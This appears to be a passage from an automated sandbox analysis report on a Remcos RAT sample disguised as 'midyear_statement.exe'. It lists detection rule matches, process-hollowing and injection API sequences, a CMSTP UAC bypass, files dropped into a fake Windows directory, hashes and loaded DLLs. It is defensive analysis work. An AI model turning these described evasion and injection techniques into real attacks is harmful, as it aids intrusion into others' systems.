                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BCD1C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_040BCD1C
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BCE00 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_040BCE00
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7EE8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_040B7EE8
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BD850 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,Sleep,WinExec,WinExec,RtlMoveMemory,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess,0_2_040BD850
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B78F8 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_040B78F8
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_040B7A50
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BA160 GetModuleHandleW,GetProcAddress,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,CloseHandle,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,0_2_040BA160
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040C62C4 CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess,0_2_040C62C4
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BD850 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,Sleep,WinExec,WinExec,RtlMoveMemory,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess,0_2_040BD850
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BCD1A RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_040BCD1A
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7EE6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_040B7EE6
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B78F6 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_040B78F6
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123480EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,24_2_123480EF
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123432D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,24_2_123432D2
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234BB35 OpenProcess,NtResumeProcess,CloseHandle,24_2_1234BB35
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234BB09 OpenProcess,NtSuspendProcess,CloseHandle,24_2_1234BB09
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,27_2_0040DD85
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00401806 NtdllDefWindowProc_W,27_2_00401806
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_004018C0 NtdllDefWindowProc_W,27_2_004018C0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_004016FD NtdllDefWindowProc_A,28_2_004016FD
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_004017B7 NtdllDefWindowProc_A,28_2_004017B7
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7EE8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_040B7EE8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123467B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,24_2_123467B4
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Windows \System32\2506803.exeJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Windows \System32\netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Windows \System32\KDECO.batJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\WindowsJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \System32Jump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile deleted: C:\Windows \System32\netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A20C40_2_040A20C4
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_004057B824_2_004057B8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005CF0DD24_2_005CF0DD
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005B817F24_2_005B817F
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005E410D24_2_005E410D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C82C824_2_005C82C8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005CF33A24_2_005CF33A
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C955224_2_005C9552
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C86E024_2_005C86E0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C472824_2_005C4728
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005DE7AB24_2_005DE7AB
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005B882824_2_005B8828
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005AE94424_2_005AE944
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005B899124_2_005B8991
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C8B1524_2_005C8B15
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005B7BF024_2_005B7BF0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C6C4024_2_005C6C40
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005CEC7F24_2_005CEC7F
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C7DCC24_2_005C7DCC
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005A4DAC24_2_005A4DAC
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005AFEDC24_2_005AFEDC
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005CEEAE24_2_005CEEAE
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C8F4A24_2_005C8F4A
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005E4F3B24_2_005E4F3B
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005D6FD224_2_005D6FD2
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236E2FB24_2_1236E2FB
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1238332B24_2_1238332B
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1235739D24_2_1235739D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234F0FA24_2_1234F0FA
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123470C224_2_123470C2
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236E0CC24_2_1236E0CC
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234712124_2_12347121
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234710424_2_12347104
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236816824_2_12368168
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1238415924_2_12384159
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123761F024_2_123761F0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123686E824_2_123686E8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236877024_2_12368770
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123674E624_2_123674E6
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236E55824_2_1236E558
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12357A4624_2_12357A46
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234DB6224_2_1234DB62
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12357BAF24_2_12357BAF
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123678FE24_2_123678FE
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236394624_2_12363946
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1237D9C924_2_1237D9C9
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12356E0E24_2_12356E0E
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12365E5E24_2_12365E5E
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236DE9D24_2_1236DE9D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12366FEA24_2_12366FEA
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12343FCA24_2_12343FCA
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12367D3324_2_12367D33
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1464B5C124_2_1464B5C1
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1465719424_2_14657194
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044B04027_2_0044B040
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0043610D27_2_0043610D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044731027_2_00447310
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044A49027_2_0044A490
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040755A27_2_0040755A
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0043C56027_2_0043C560
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044B61027_2_0044B610
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044D6C027_2_0044D6C0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_004476F027_2_004476F0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044B87027_2_0044B870
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044081D27_2_0044081D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0041495727_2_00414957
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_004079EE27_2_004079EE
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00407AEB27_2_00407AEB
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044AA8027_2_0044AA80
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00412AA927_2_00412AA9
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00404B7427_2_00404B74
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00404B0327_2_00404B03
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044BBD827_2_0044BBD8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00404BE527_2_00404BE5
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00404C7627_2_00404C76
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00415CFE27_2_00415CFE
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00416D7227_2_00416D72
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00446D3027_2_00446D30
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 27_2_00446D8B
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 27_2_00406E8F
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_00405038
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_0041208C
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_004050A9
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_0040511A
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_0043C13A
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_004051AB
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_00449300
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_0040D322
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_0044A4F0
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_0043A5AB
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_00413631
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_00446690
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_0044A730
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_004398D8
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_004498E0
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_0044A886
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_0043DA09
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_00438D5E
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_00449ED0
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_0041FE83
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_00430F54
Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\wkrriuhD.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: Joe Sandbox View | Dropped File: C:\Windows \System32\2506803.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: String function: 040A47D0 appears 931 times
Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: String function: 040A4470 appears 67 times
Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: String function: 040A4668 appears 250 times
Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: String function: 040B7B88 appears 45 times
Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: String function: 040A660C appears 33 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 004169A7 appears 87 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 004165FF appears 35 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 005C5552 appears 41 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 00422297 appears 42 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 12364E10 appears 54 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 00592C47 appears 34 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 0040A6C4 appears 68 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 12332093 appears 50 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 005C5BF2 appears 54 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 00444B5A appears 37 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 12331E65 appears 35 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 00413025 appears 79 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 12364770 appears 41 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: String function: 00416760 appears 69 times
Source: netutils.dll.0.dr | Static PE information: Number of sections : 19 > 10
Source: midyear_statement.exe | Binary or memory string: OriginalFilename vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1366143666.0000000002A80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1381770717.0000000016137000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1382468437.0000000016170000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1380482770.0000000015C00000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: url.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: archiveint.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: amsi.dll (7 consecutive identical entries)
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: eamsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: amsi.dll (5 consecutive identical entries)
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: amsi.dll (36 consecutive identical entries)
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: am.dll (47 consecutive identical entries)
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: amsi.dll (47 consecutive identical entries)
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: am.dll (2 consecutive identical entries)
Source: C:\Users\user\Desktop\midyear_statement.exe | Section loaded: amsi.dll (22 consecutive identical entries)
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
